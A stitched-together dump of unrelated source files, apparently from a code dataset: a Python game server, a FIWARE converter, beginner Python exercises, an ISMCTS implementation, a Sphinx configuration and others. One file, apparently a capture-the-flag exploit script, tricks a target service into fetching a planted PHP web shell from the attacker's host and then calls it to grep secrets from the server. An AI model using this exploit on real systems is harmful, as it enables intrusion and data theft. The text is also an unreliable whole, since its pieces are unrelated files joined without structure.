player = self.players[p] if player.get_number_of_areas() == self.board.get_number_of_areas(): self.process_win(player.get_nickname(), player.get_name()) return True return False def process_win(self, player_nick, player_name): self.summary.set_winner(player_nick) self.logger.info("Player {} ({}) wins!".format(player_nick, player_name)) for i in self.players: self.send_message(self.players[i], 'game_end', winner=player_name) ############## # NETWORKING # ############## def get_message(self, player): """Read message from client Parameters ---------- player : int Name of the client Returns ------- str Decoded message from the client """ raw_message = self.client_sockets[player].recv(self.buffer) msg = json.loads(raw_message.decode()) self.logger.debug("Got message from client {}; type: {}".format(player, msg['type'])) return msg def send_message(self, client, type, battle=None, winner=None, areas=None): """Send message to a client Parameters ---------- client : Player Recepient of the message type : str Type of message battle : dict Result of a battle winner : int Winner of the game areas : list of int Areas changed during the turn """ self.logger.debug("Sending msg type '{}' to client {}".format(type, client.get_name())) if type == 'game_start': msg = self.get_state() msg['type'] = 'game_start' msg['player'] = client.get_name() msg['no_players'] = self.number_of_players msg['current_player'] = self.current_player.get_name() msg['board'] = self.board.get_board() msg['order'] = self.players_order elif type == 'game_state': msg = self.get_state() msg['type'] = 'game_state' msg['player'] = client.get_name() msg['no_players'] = self.number_of_players msg['current_player'] = self.current_player.get_name() elif type == 'battle': msg = self.get_state() msg['type'] = 'battle' msg['result'] = battle elif type == 'end_turn': msg = self.get_state() msg['type'] = 'end_turn' msg['areas'] = areas msg['current_player'] = self.current_player.get_name() msg['reserves'] = { i: self.players[i].get_reserve() for i in self.players } elif type == 'game_end': msg = { 'type': 'game_end', 'winner': winner } elif type == 'close_socket': msg = {'type': 'close_socket'} msg = json.dumps(msg) client.send_message(msg + '\0') def create_socket(self): """Initiate server socket """ try: self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) self.socket.bind((self.address, self.port)) self.logger.debug("Server socket at {}:{}".format(self.address, self.port)) except OSError as e: self.logger.error("Cannot create socket. {0}.".format(e)) exit(1) def connect_clients(self): """Connect all clients """ self.client_sockets = {} self.socket.listen(self.number_of_players) self.logger.debug("Waiting for clients to connect") for i in range(1, self.number_of_players + 1): self.connect_client(i) hello_msg = self.get_message(i) if hello_msg['type'] != 'client_desc': raise ValueError("Client send a wrong-type hello message '{}'".format(hello_msg)) self.players[i].set_nickname(hello_msg['nickname']) self.logger.debug("Successfully assigned clients to all players") def connect_client(self, i): """Assign client to an instance of Player """ sock, client_address = self.socket.accept() self.add_client(sock, client_address, i) def add_client(self, connection, client_address, i): """Add client's socket to an instance of Player Parameters ---------- connection : socket Client's socket client_addres : (str, int) Client's address and port number i : int Player's name Returns ------- Player Instance of Player that the client was assigned to """ self.client_sockets[i] = connection player = self.assign_player_to_client(connection, client_address) if not player: raise Exception("Could not assign player to client {}".format(client_address)) else: return player def assign_player_to_client(self, socket, client_address): """Add client's socket to an unassigned player """ player = self.get_unassigned_player() if player: player.assign_client(socket, client_address) return player else: return False def get_unassigned_player(self): """Get a player with unassigned client """ for player in self.players: if not self.players[player].has_client(): return self.players[player] return False def close_connections(self): """Close server's socket """ self.logger.debug("Closing server socket") self.socket.close() ################## # INITIALIZATION # ################## def initialize_players(self): self.players = {} for i in range(1, self.number_of_players + 1): self.players[i] = Player(i) self.players_order = list(range(1, self.number_of_players + 1)) random.shuffle(self.players_order) self.set_first_player() self.logger.debug("Player order {0}".format(self.players_order)) def assign_areas_to_players(self, ownership): """Assigns areas to players at the start of the game """ assert(len(ownership) == self.board.get_number_of_areas()) for area_name, player_name in ownership.items(): area = self.board.get_area_by_name(area_name) self.assign_area(area, self.players[player_name]) def adjust_player_order(self, nicknames_order): renumbering = {old_name: nicknames_order.index(player.nickname)+1 for old_name, player in self.players.items()} self.players = {renumbering[old_name]: player for old_name, player in self.players.items()} for name, player in self.players.items(): player.name = name self.client_sockets = {renumbering[old_name]: socket for old_name, socket in self.client_sockets.items()} registered_nicknames_rev = {player.nickname: player_name for player_name, player in self.players.items()} assert(len(nicknames_order) == len(registered_nicknames_rev)) assert(set(nicknames_order) == set(registered_nicknames_rev.keys())) self.players_order = [] for nick in nicknames_order: self.players_order.append(registered_nicknames_rev[nick]) self.set_first_player() def report_player_order(self): self.logger.info('Player order: {}'.format([(name, self.players[name].nickname) for name in self.players_order]))
2.96875
3
gluoncv/data/video_custom/__init__.py
Kentwhf/gluon-cv
48
12789929
<reponame>Kentwhf/gluon-cv<gh_stars>10-100 # pylint: disable=wildcard-import """Video related tasks. Custom data loader """ from __future__ import absolute_import from .classification import *
1.03125
1
object_fiware_converter.py
iml130/FiwareObjectConverter
0
12789930
# Copyright 2018 <NAME> # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """ This Module converts Python-Objects into the Fiware-JSON-Format. For more Information how to use this class, see the Readme.md You can find the needed Files to convert from an Object into JSON in the folder JsonToObject and vice versa """ import json import sys, os # Adding This Sub-Project into the PythonPath sys.path.append(os.path.dirname(os.path.realpath(__file__))) from json_to_object.reverse_entity import ReverseEntity from object_to_json.entity import Entity class ObjectFiwareConverter(object): """ This class should be primarily used to convert a Object <-> JSON-string. The classes in subdirectories are either used to convert them into JSON or into a Python-specific-Object. """ @classmethod def obj2Fiware(clsself, _object, ind=0, dataTypeDict={}, ignorePythonMetaData=False, showIdValue=True, encode=False): en = Entity() en.setObject(_object, dataTypeDict, ignorePythonMetaData, showIdValue= showIdValue, encode=encode) return clsself._json(en, ind) @classmethod def fiware2Obj(clsself, _fiwareEntity, _objectStructure={}, useMetaData=True, ignoreWrongDataType=False, setAttr=False, encoded=False): jsonObj= None if(type(_fiwareEntity) is str): jsonObj = clsself._obj(_fiwareEntity) else: jsonObj = _fiwareEntity re = ReverseEntity(**jsonObj) return re.setObject(_objectStructure, useMetaData, ignoreWrongDataType, setAttr, encoded=encoded) @classmethod def _complex_handler(clsself, Obj): if hasattr(Obj, '__dict__'): return Obj.__dict__ else: raise TypeError('Object of type %s with value of %s is not JSON serializable' % ( type(Obj), repr(Obj))) @classmethod def _json(clsself, obj, ind=0): return json.dumps(obj.__dict__, default=clsself._complex_handler, indent=ind) @classmethod def _obj(clsself, json_str): return json.loads(json_str)
2.140625
2
Loops/ForLoop1.py
lytranp/Tutoring-PythonIntroduction
0
12789931
<gh_stars>0 ## There are 2 types of loops: # definite iteration # and indefinite iteration until the program determines to stop it ## for loop: control statement that most easily supports definite iteration for eachPass in range(4): print("It's alive!", end = " ") number = 2 exponential = 3 product = 1 for i in range(exponential): product = product * number print(product, end = " ") ## Compute sum of a sequence of numbers from a lowers bound through an upper bound lower = int(input("Enter the lower bound: ")) upper = int(input("Enter the upper bound: ")) thesum = 0 for number in range (lower, upper + 1): thesum += number print(thesum)
4.1875
4
code/012.py
i4leader/Python-Basic-Pratice-100question
0
12789932
<filename>code/012.py #!/usr/bin/python3 import math count = 0 leap = 1 for i in range(101,201): k = int(math.sqrt(i+1)) for j in range(2,k+1): if i%j == 0: leap = 0 break if leap == 1: print(i) count += 1 leap = 1 print("素数总计数:%d"%count)
3.796875
4
components/footer.py
nt409/dash_template
0
12789933
<filename>components/footer.py<gh_stars>0 import dash_html_components as html footer = html.Footer([ html.Div( html.Div([ html.A("Home", href="/", className="footer-navlink"), html.A("Model", href="/model", className="footer-navlink"), html.A("Data", href="/data", className="footer-navlink"), ], className="footer-wrapper footer-link-cont", ), className="footer-links"), html.Div( html.Div([ "Some footer text" ], className="footer-wrapper"), className="foot-container", ), ], )
2.140625
2
src/models/components/utils.py
philip-mueller/lovt
3
12789934
<filename>src/models/components/utils.py<gh_stars>1-10 from abc import ABC, abstractmethod from dataclasses import dataclass from functools import partial from typing import Optional, Union, Tuple, Any import torch from omegaconf import MISSING from torch import nn import torch.nn.functional as F from torch.utils.data.dataloader import default_collate from common.dataclass_utils import TensorDataclassMixin def get_norm_layer(norm: Optional[str], d): if norm is None: return lambda x: x elif norm == 'layer': return nn.LayerNorm(d) elif norm == 'batch': return nn.BatchNorm1d(d) elif norm == 'l2': return partial(F.normalize, dim=-1, p=2) else: raise NotImplementedError @dataclass class EncoderConfig: _encoder_cls_: str = MISSING modality: str = MISSING class EncoderInterface(ABC): def __init__(self): super(EncoderInterface, self).__init__() self.transform = lambda x: x self.val_transform = lambda x: x self.batch_collator = default_collate @property def max_region_size(self): return None @abstractmethod def update_data_augmentation(self, data_augmentation_config: Optional[Any] = None): ... @dataclass class AttentionMask(TensorDataclassMixin): binary_mask: torch.Tensor inverted_binary_mask: torch.Tensor additive_mask: torch.Tensor @staticmethod def from_binary_mask(binary_mask: torch.Tensor, dtype): if binary_mask is not None: binary_mask = binary_mask.bool() additive_mask = AttentionMask._compute_additive_attention_mask(binary_mask, dtype) return AttentionMask(binary_mask, ~binary_mask, additive_mask) @staticmethod def from_binary_mask_or_attention_mask(mask: Optional[Union['AttentionMask', torch.Tensor]], dtype): if mask is None or isinstance(mask, AttentionMask): return mask else: assert isinstance(mask, torch.Tensor) and (mask.dtype in (torch.bool, torch.uint8, torch.int64)), \ (type(mask), mask.dtype) return AttentionMask.from_binary_mask(mask, dtype) @staticmethod def _compute_additive_attention_mask(binary_attention_mask: torch.Tensor, dtype): if binary_attention_mask is None: return None additive_attention_mask = torch.zeros_like(binary_attention_mask, dtype=dtype) additive_attention_mask.masked_fill_(~binary_attention_mask, float('-inf')) return additive_attention_mask @staticmethod def get_additive_mask(mask: Optional[Union['AttentionMask', torch.Tensor]], dtype): if mask is None: return None if isinstance(mask, AttentionMask): return mask.additive_mask elif mask.dtype == torch.bool or mask.dtype == torch.uint8: return AttentionMask._compute_additive_attention_mask(mask, dtype) else: return mask @staticmethod def get_additive_cross_attention_mask(mask_a: Optional['AttentionMask'] = None, mask_b: Optional['AttentionMask'] = None, mask_ab: Optional['AttentionMask'] = None): """ :param mask_a: (B x N_a) :param mask_b: (B x N_b) :param mask_ab: (B x N_a x N_b) :return: """ if mask_a is None and mask_b is None and mask_ab is None: return None else: mask = 0. if mask_ab is not None: mask = mask + mask_ab.additive_mask if mask_a is not None: mask = mask + mask_a.additive_mask[:, :, None] if mask_b is not None: mask = mask + mask_b.additive_mask[:, None, :] return mask @dataclass class EncoderOutput(TensorDataclassMixin): local_features: Optional[torch.Tensor] global_features: Optional[torch.Tensor] local_structure_size: Union[int, Tuple[int, int]] local_mask: Optional[AttentionMask] = None local_weights: Optional[torch.Tensor] = None
2.1875
2
sploits/startup/startup_sploit.py
vient/proctf-2019
2
12789935
#!/usr/bin/python3 import socket import requests import sys if len(sys.argv) < 3: print("Usage: ./startup_sploit <host> <my_ip>") exit(1) PORT = 3255 HOST = sys.argv[1] MYIP = sys.argv[2] MYPORT = "0" * (921-len(MYIP)) + "4000" MANIFEST = '{"links": [{"url": "http://mirror/wyjzmw.php", "checksum": "32bfce7a147d2fb0c87ff234c2848a37"}, {"url": "http://mirror/JhXY.php", "checksum": "d55ec508be338092ab591f3d7e4ab929"}]}' SIGNATURE = 'c2f5e7a6e44e2fc4076a5930df75b02220c5f9313e0f3faa7ecb4e281dca359bc12426715e7c2902934e6995c9cdbcda93b8c4e0e5993f25309267b79978f504' FAKE_PHP = br"""<?php if($_GET["key"]=="KnfSM")system("grep '=\";' *")?>""" PAYLOAD = b"""AAAAAA Url: http://%s:%s/JhXY.php Success: true Hashsum: d55ec508be338092ab591f3d7e4ab929\n\n\n\n\n\n\n\n\n\n Content-Length: %d %s""" % (MYIP.encode(), MYPORT.encode(), len(FAKE_PHP), FAKE_PHP) ANS = b"""HTTP/1.1 200 OK Content-Length: %d %s?>""" % (len(PAYLOAD), PAYLOAD) c = socket.socket() c.connect((HOST, PORT)) from_client = c.makefile("r") to_client = c.makefile("w") print(from_client.readline().strip()) print(from_client.readline().strip()) to_client.write("%s:%s\n" % (MYIP, MYPORT)); to_client.flush() print(from_client.readline().strip()) to_client.write(MANIFEST+"\n"); to_client.flush() print(from_client.readline().strip()) to_client.write(SIGNATURE+"\n"); to_client.flush() s = socket.socket() s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) s.bind(("0.0.0.0", int(MYPORT))) s.listen() cl, cl_info = s.accept() print("Got connection from %s, sending files" % (cl_info, )) cl.sendall(ANS) print(from_client.readline().strip()) print(from_client.readline().strip()) print(from_client.readline().strip()) print(requests.get("http://%s/JhXY.php?key=KnfSM" % HOST).text)
2.390625
2
Patterns/Adapter_solution.py
alex123012/Coursera_Python_and_Django
0
12789936
<filename>Patterns/Adapter_solution.py class MappingAdapter: def __init__(self, adaptee): self.adaptee = adaptee def lighten(self, grid): lights, obtacles = self.__find_all(grid) height, width = len(grid[0]), len(grid) self.adaptee.set_dim((height, width)) self.adaptee.set_lights(lights) self.adaptee.set_obstacles(obtacles) return self.adaptee.generate_lights() def __find_all(self, grid): lights = [] obtacles = [] for i, j in enumerate(grid): for k, g in enumerate(j): if g == 1: lights.append((k, i)) if g == -1: obtacles.append((k, i)) return lights, obtacles if __name__ == '__main__': class Light: def __init__(self, dim): self.dim = dim self.grid = [[0 for i in range(dim[0])] for _ in range(dim[1])] self.lights = [] self.obstacles = [] def set_dim(self, dim): self.dim = dim self.grid = [[0 for i in range(dim[0])] for _ in range(dim[1])] def set_lights(self, lights): self.lights = lights self.generate_lights() def set_obstacles(self, obstacles): self.obstacles = obstacles self.generate_lights() def generate_lights(self): return self.grid.copy() class System: def __init__(self): self.map = self.grid = [[0 for i in range(30)] for _ in range(20)] self.map[5][7] = 1 # Источники света self.map[5][2] = -1 # Стены def get_lightening(self, light_mapper): self.lightmap = light_mapper.lighten(self.map) # for i in self.lightmap: # print(i) sys = System() sys.get_lightening(MappingAdapter(Light))
3.03125
3
scripts/properties_parser.py
Cypheruim/minebot
1
12789937
from dataclasses import dataclass # Parser to read and modify Minecraft server.properties files @dataclass class PropertiesParser: file_path: str data: dict def __init__(self, file_path: str): self.file_path = file_path self.data = None # Gets the value of property def get(self, prop: str): return self.data.get(prop) # Sets property 'prop' to 'val' def set(self, prop: str, val: str): self.data[prop] = val def __enter__(self): self.data = dict() with open(self.file_path, "r") as f: for l in f: line = l.strip() # Skip comments if line.startswith("#"): continue values = line.split("=") if len(values) != 2: continue prop, val = values self.data[prop] = val return self def __exit__(self, exc_type, exc_val, exc_tb): self.save() self.data = None # Saves the data to the original file # Comments are not saved since they're not important def save(self): with open(self.file_path, "w") as f: for prop, val in self.data.items(): f.write(f"{prop}={val}\n")
3.484375
3
iniciante/python/1065-pares-entre-cinco-numeros.py
tfn10/beecrowd
0
12789938
<filename>iniciante/python/1065-pares-entre-cinco-numeros.py def pares(): valores_pares = i = 0 while i < 5: numero = int(input()) if numero % 2 == 0: valores_pares += 1 i += 1 print(f'{valores_pares} valores pares') pares()
3.765625
4
readable/__init__.py
amalchuk/readable
0
12789939
# Copyright 2020-2021 <NAME>. All rights reserved. # This project is licensed under the terms of the MIT License. """ Check and improve the spelling and grammar of documents. """
1.40625
1
ccal/is_str_version.py
alex-wenzel/ccal
0
12789940
def is_str_version(str_): str_split = str_.split(sep=".") return "." in str_ and len(str_split) == 3 and all(i.isnumeric() for i in str_split)
3.140625
3
python/13_File_IO/04_rw_binfile.py
ihaolin/script-repo
0
12789941
<reponame>ihaolin/script-repo import array nums = array.array('i', [1,2,3,4]) with open('data.bin', 'wb') as f: f.write(nums) a = array.array('i', [0,0,0,0,0,0]) with open('data.bin', 'rb') as f: f.readinto(a) print(a)
2.609375
3
setup.py
ASKBOT/askbot-slack
3
12789942
<gh_stars>1-10 from setuptools import setup setup( name="askbot-slack", version="0.1.3", classifiers=[ "Development Status :: 5 - Production/Stable", "Intended Audience :: Developers", "Programming Language :: Python :: 2", "Programming Language :: Python :: 2.6", "Programming Language :: Python :: 2.7", ], py_modules=['askbot_slack'], install_requires=['askbot', 'requests'], author="<NAME>", author_email="<EMAIL>", description="Simple Slack integration for Askbot.", long_description="When questions are created, edited or responded to in Askbot a message is sent to a specified channel in Slack.", license="MIT", keywords="askbot slack integration", url="https://github.com/jonmbake/askbot-slack", include_package_data=True, zip_safe=False, )
1.398438
1
yugioh/ISMCTS.py
mnoyes68/yu-gi-oh
0
12789943
<reponame>mnoyes68/yu-gi-oh<filename>yugioh/ISMCTS.py import random import math import numpy as np import logging class Node(): def __init__(self, player, opponent, turn_number, is_player_turn): self.player = player self.opponent = opponent self.info_set = InfoSet(player, opponent) self.turn_number = turn_number self.sims = 0 self.wins = 0 self.edges = [] if is_player_turn: self.turn = player else: self.turn = opponent self.set_terminal_status() def set_terminal_status(self): if self.player.life_points == 0 or self.opponent.life_points == 0: self.terminal = True else: self.terminal = False def get_actions(self): actions = [] for edge in self.edges: actions.append(edge.action) return actions def isLeaf(self): if len(self.edges) > 0: return False else: return True class Edge(): def __init__(self, pre_node, post_node, action): self.pre_node = pre_node self.post_node = post_node self.turn = pre_node.turn self.action = action class InfoSet(): def __init__(self, player, opponent): self.player_hand = player.hand self.player_board = player.board self.opponent_hand_size = opponent.hand.get_size() self.opponent_board = opponent.board def __eq__(self, other): if isinstance(other, InfoSet): return (self.player_hand == other.player_hand and self.player_board == other.player_board and self.opponent_hand_size == other.opponent_hand_size and self.opponent_board == other.self.opponent_board) return False def __ne__(self, other): return not self.__eq__(other) def __hash__(self): player_hand_ids = (o.card_id for o in self.player_hand.get_cards()).sort() player_board_ids = (o.card_id for o in self.player_board.get_monsters()).sort() player_grave_ids = (o.card_id for o in self.player_board.graveyard.get_cards()).sort() opponent_board_ids = (o.card_id for o in self.opponent_board.get_monsters()).sort() opponent_grave_ids = (o.card_id for o in self.opponent_board.graveyard.get_cards()).sort() return hash(str(player_hand_ids) + ":" + str(player_board_ids) + ":" + str(player_grave_ids) + ":" + str(self.opponent_hand_size) + ":" + str(opponent_board_ids) + ":" + str(opponent_grave_ids)) class ISMCTS(): def __init__(self, root): self.root = root self.tree = set() self.add_node(root) def __len__(self): return len(self.tree) def add_node(self, node): self.tree.add(node) def select_sim_node(self): current_node = self.root edges = [] logging.debug('Traversing ISMCTS') while not current_node.isLeaf(): #edge_choice = random.choice(current_node.edges) max_score = 0 for edge in current_node.edges: node_score = (edge.pre_node.wins / float(edge.pre_node.sims)) ucb1_score = self.ucb1(node_score, edge.pre_node.sims, edge.post_node.sims) if ucb1_score > max_score: edge_choice = edge max_score = ucb1_score edges.append(edge_choice) current_node = edge_choice.post_node return current_node, edges def expand(self, pre_node, player, opponent, action, turn_number, is_player_turn): post_node = Node(player, opponent, turn_number, is_player_turn) edge = Edge(pre_node, post_node, action) pre_node.edges.append(edge) self.tree.add(post_node) return edge, post_node def back_propogate(self, node, edges, player_wins): #print "Backpropogating with", len(edges), "edges" current_node = node while current_node != None: #print "Iterating through back propogation" current_node.sims += 1 if player_wins: current_node.wins += 1 if not edges: current_node = None else: edge = edges.pop(-1) current_node = edge.pre_node def ucb1(self, node_score, total_sims, edge_sims): c = math.sqrt(2) #c = .1 return node_score + (c * math.sqrt(np.log(total_sims)/edge_sims))
2.734375
3
DynamicProgramming/PalindromicSubstrings.py
LinXueyuanStdio/leetcode
0
12789944
<filename>DynamicProgramming/PalindromicSubstrings.py<gh_stars>0 ''' Given a string, your task is to count how many palindromic substrings in this string. The substrings with different start indexes or end indexes are counted as different substrings even they consist of same characters. Example 1: Input: "abc" Output: 3 Explanation: Three palindromic strings: "a", "b", "c". Example 2: Input: "aaa" Output: 6 Explanation: Six palindromic strings: "a", "a", "a", "aa", "aa", "aaa". Note: The input string length won't exceed 1000. ''' class Solution(object): def countSubstrings(self, s): """ :type s: str :rtype: int """ ans = 0 for center in xrange(2*len(s) - 1): left = center / 2 right = left + center % 2 while left >= 0 and right < len(s) and s[left] == s[right]: ans += 1 left -= 1 right += 1 return ans
4.15625
4
contentcuration/contentcuration/migrations/0040_file_assessment_item.py
Tlazypanda/studio
1
12789945
# -*- coding: utf-8 -*- # Generated by Django 1.9.7 on 2016-11-07 22:29 from __future__ import unicode_literals import django.db.models.deletion from django.db import migrations from django.db import models class Migration(migrations.Migration): dependencies = [ ('contentcuration', '0039_auto_20161101_1555'), ] operations = [ migrations.AddField( model_name='file', name='assessment_item', field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='files', to='contentcuration.AssessmentItem'), ), ]
1.484375
1
docs/conf.py
airr-community/airr-standards
35
12789946
<reponame>airr-community/airr-standards #!/usr/bin/env python3 # -*- coding: utf-8 -*- # # airr-standards documentation build configuration file, created by # sphinx-quickstart on Fri Nov 17 14:47:21 2017. # # This file is execfile()d with the current directory set to its # containing dir. # # Note that not all possible configuration values are present in this # autogenerated file. # # All configuration values have a default; values that are commented out # serve to show the default. # If extensions (or modules to document with autodoc) are in another directory, # add these directories to sys.path here. If the directory is relative to the # documentation root, use os.path.abspath to make it absolute, like shown here. # -- Imports ---------------------------------------------------------------- import csv import os import sys import yaml import yamlordereddictloader from unittest.mock import MagicMock # -- Python environment ---------------------------------------------------- # Python system path sys.path.append(os.path.abspath('.')) # Mock modules for ReadTheDocs if os.environ.get('READTHEDOCS', None) == 'True': class Mock(MagicMock): @classmethod def __getattr__(cls, name): return MagicMock() mock_modules = ['numpy', 'pandas'] sys.modules.update((mod_name, Mock()) for mod_name in mock_modules) # -- General configuration ------------------------------------------------ # Setup # def setup(app): # # Can also be a full URL # app.add_stylesheet('submenus.css') # app.add_stylesheet("overrides.css") rst_prolog =''' .. |br| raw:: html <br /> ''' # Minimal Sphinx version needs_sphinx = '1.6' # Sphinx extension modules extensions = ['sphinx.ext.autodoc', 'sphinx.ext.napoleon', 'sphinxcontrib.autoprogram', 'rstjinjaext'] # Define source file extensions source_suffix = ['.rst'] # List of patterns, relative to source directory, that match files and # directories to ignore when looking for source files. exclude_patterns = ['_build', 'Thumbs.db', '.DS_Store'] # Add any paths that contain templates here, relative to this directory. templates_path = ['_templates'] # The master toctree document. master_doc = 'index' # General information about the project. project = 'AIRR Standards' copyright = '2017-2021, AIRR Community' author = 'AIRR Community' # The name of the Pygments (syntax highlighting) style to use. highlight_language = 'bash' pygments_style = 'vs' # If true, `todo` and `todoList` produce output, else they produce nothing. todo_include_todos = False # -- Options for HTML output ------------------------------------------ # Add any paths that contain custom static files (such as style sheets) here, # relative to this directory. They are copied after the builtin static files, # so a file named "default.css" will overwrite the builtin "default.css". html_static_path = ['_static'] # HTML help htmlhelp_basename = 'airr-standardsdoc' # Alabaster options # html_theme = 'alabaster' # html_theme_options = {'github_user': 'airr-community', # 'github_repo': 'airr-standards', # 'github_button': True, # 'sidebar_includehidden': True, # 'sidebar_width': '300px', # 'extra_nav_links': {'AIRR Community': 'http://airr-community.org'}} # html_sidebars = {'**': ['about.html', # 'navigation.html', # 'searchbox.html']} # PyData options # html_theme = "pydata_sphinx_theme" html_theme = "sphinx_book_theme" html_logo = "_static/AIRR_logo-only.png" # Bootstrap options # html_theme = 'bootstrap' # html_theme_path = sphinx_bootstrap_theme.get_html_theme_path() # html_sidebars = {'**': ['searchbox.html', 'globaltoc.html']} # html_sidebars = {'**': ['globaltoc.html']} # html_sidebars = {'**': ['globaltoc.html', 'sourcelink.html', 'searchbox.html']} # html_sidebars = {'**': ['searchbox.html', 'globaltoc.html']} # html_theme_options = { # # Navigation bar title. (Default: ``project`` value) # 'navbar_title': 'AIRR Community Standards', # # # Tab name for entire site. (Default: "Site") # 'navbar_site_name': 'Contents', # # # A list of tuples containing pages or urls to link to. # # Valid tuples should be in the following forms: # # (name, page) # a link to a page # # (name, "/aa/bb", 1) # a link to an arbitrary relative url # # (name, "http://example.com", True) # arbitrary absolute url # # Note the "1" or "True" value above as the third argument to indicate # # an arbitrary url. # # 'navbar_links': [('GitHub', 'https://github.com/airr-community/airr-standards', True), # # ('AIRR-C', 'http://airr-community.org', True)], # # # Render the next and previous page links in navbar. (Default: true) # 'navbar_sidebarrel': True, # # # Render the current pages TOC in the navbar. (Default: true) # 'navbar_pagenav': True, # # # Tab name for the current pages TOC. (Default: "Page") # 'navbar_pagenav_name': 'Page', # # # Global TOC depth for "site" navbar tab. (Default: 1) # # Switching to -1 shows all levels. # 'globaltoc_depth': 1, # # # Include hidden TOCs in Site navbar? # # # # Note: If this is "false", you cannot have mixed ``:hidden:`` and # # non-hidden ``toctree`` directives in the same page, or else the build # # will break. # # # # Values: "true" (default) or "false" # 'globaltoc_includehidden': 'false', # # # HTML navbar class (Default: "navbar") to attach to <div> element. # # For black navbar, do "navbar navbar-inverse" # 'navbar_class': 'navbar', # # # Fix navigation bar to top of page? # # Values: "true" (default) or "false" # 'navbar_fixed_top': 'true', # # # Location of link to source. # # Options are "nav" (default), "footer" or anything else to exclude. # 'source_link_position': 'none', # # # Bootswatch (http://bootswatch.com/) theme. # # # # Options are nothing (default) or the name of a valid theme # # such as "cosmo" or "sandstone". # # # # The set of valid themes depend on the version of Bootstrap # # that's used (the next config option). # # # # Currently, the supported themes are: # # - Bootstrap 2: https://bootswatch.com/2 # # - Bootstrap 3: https://bootswatch.com/3 # 'bootswatch_theme': 'spacelab', # # # Choose Bootstrap version. # # Values: "3" (default) or "2" (in quotes) # 'bootstrap_version': '2', # } # -- Options for LaTeX output --------------------------------------------- latex_elements = { # The paper size ('letterpaper' or 'a4paper'). # # 'papersize': 'letterpaper', # The font size ('10pt', '11pt' or '12pt'). # # 'pointsize': '10pt', # Additional stuff for the LaTeX preamble. # # 'preamble': '', # Latex figure (float) alignment # # 'figure_align': 'htbp', } # Grouping the document tree into LaTeX files. List of tuples # (source start file, target name, title, # author, documentclass [howto, manual, or own class]). latex_documents = [ (master_doc, 'airr-standards.tex', 'airr-standards Documentation', 'AIRR Community', 'manual'), ] # -- Options for manual page output --------------------------------------- # One entry per manual page. List of tuples # (source start file, name, description, authors, manual section). man_pages = [ (master_doc, 'airr-standards', 'airr-standards Documentation', [author], 1) ] # -- Options for Texinfo output ------------------------------------------- # Grouping the document tree into Texinfo files. List of tuples # (source start file, target name, title, author, # dir menu entry, description, category) texinfo_documents = [ (master_doc, 'airr-standards', 'airr-standards Documentation', author, 'airr-standards', 'One line description of project.', 'Miscellaneous'), ] # -- Build schema reference tables ---------------------------------------- # Function to chop down long strings of the table def wrap_col(string, str_length=11): """ String wrap """ if [x for x in string.split(' ') if len(x) > 25]: parts = [string[i:i + str_length].strip() for i in range(0, len(string), str_length)] return ('\n'.join(parts) + '\n') else: return (string) def parse_schema(spec, schema): """ Parse an AIRR schema object for doc tables Arguments: spec (str): name of the schema object schema (dict): master schema dictionary parsed from the yaml file. Returns: list: list of dictionaries with parsed rows of the spec table. """ data_type_map = {'string': 'free text', 'integer': 'positive integer', 'number': 'positive number', 'boolean': 'true | false'} # Get schema properties = schema[spec]['properties'] required = schema[spec].get('required', None) # Iterate over properties table_rows = [] for prop, attr in properties.items(): # Standard attributes required_field = False if required is None or prop not in required else True title = attr.get('title', '') example = attr.get('example', '') description = attr.get('description', '') # Data type data_type = attr.get('type', '') data_format = data_type_map.get(data_type, '') # Arrays if data_type == 'array': if attr['items'].get('$ref') is not None: sn = attr['items'].get('$ref').split('/')[-1] data_type = 'array of :ref:`%s <%sFields>`' % (sn, sn) elif attr['items'].get('type') is not None: data_type = 'array of %s' % attr['items']['type'] elif attr.get('$ref') == '#/Ontology': data_type = ':ref:`Ontology <OntoVoc>`' elif attr.get('$ref') is not None: sn = attr.get('$ref').split('/')[-1] data_type = ':ref:`%s <%sFields>`' % (sn, sn) # x-airr attributes if 'x-airr' in attr: xairr = attr['x-airr'] nullable = xairr.get('nullable', True) deprecated = xairr.get('deprecated', False) identifier = xairr.get('identifier', False) # MiAIRR attributes miairr_level = xairr.get('miairr', '') miairr_set = xairr.get('set', '') miairr_subset = xairr.get('subset', '') # Set data format for ontologies and controlled vocabularies if 'format' in xairr: if xairr['format'] == 'ontology' and 'ontology' in xairr: base_dic = xairr['ontology'] ontology_format = (str(base_dic['top_node']['id']), str(base_dic['top_node']['label']) ) # Replace name with url-linked name data_format = 'Ontology: { top_node: { id: %s, value: %s}}' % (ontology_format) # Get 'type' for ontology example = 'id: %s, value: %s' % (example['id'], example['label']) elif xairr['format'] == 'controlled vocabulary': if attr.get('enum', None) is not None: data_format = 'Controlled vocabulary: %s' % ', '.join(attr['enum']) elif attr.get('items', None) is not None: data_format = 'Controlled vocabulary: %s' % ', '.join(attr['items']['enum']) else: nullable = True deprecated = False identifier = False miairr_level = '' miairr_set = '' miairr_subset = '' if deprecated: field_attributes = 'DEPRECATED' else: f = ['required' if required_field else 'optional', 'identifier' if identifier else '', 'nullable' if nullable else ''] field_attributes = ', '.join(filter(lambda x: x != '', f)) # Return dictionary r = {'Name': prop, 'Set': miairr_set, 'Subset': miairr_subset, 'Designation': title, 'Field': prop, 'Type': data_type, 'Format': data_format, 'Definition': description, 'Example': example, 'Level': miairr_level, 'Required': required_field, 'Deprecated': deprecated, 'Nullable': nullable, 'Identifier': identifier, 'Attributes': field_attributes} table_rows.append(r) return(table_rows) # Load data for schemas with open(os.path.abspath('../specs/airr-schema.yaml')) as ip: airr_schema = yaml.load(ip, Loader=yamlordereddictloader.Loader) html_context = {'airr_schema': airr_schema} # Iterate over schema and build reference tables data_elements = {} for spec in airr_schema: if 'properties' not in airr_schema[spec]: continue # Storage object data_elements[spec] = parse_schema(spec, airr_schema) # Update doc html_context html_context[spec + '_schema'] = data_elements[spec] # -- Write download tables ------------------------------------------------ # Write download spec files download_path = '_downloads' if not os.path.exists(download_path): os.mkdir(download_path) # Write MiAIRR TSV fields = ['Set', 'Subset', 'Designation', 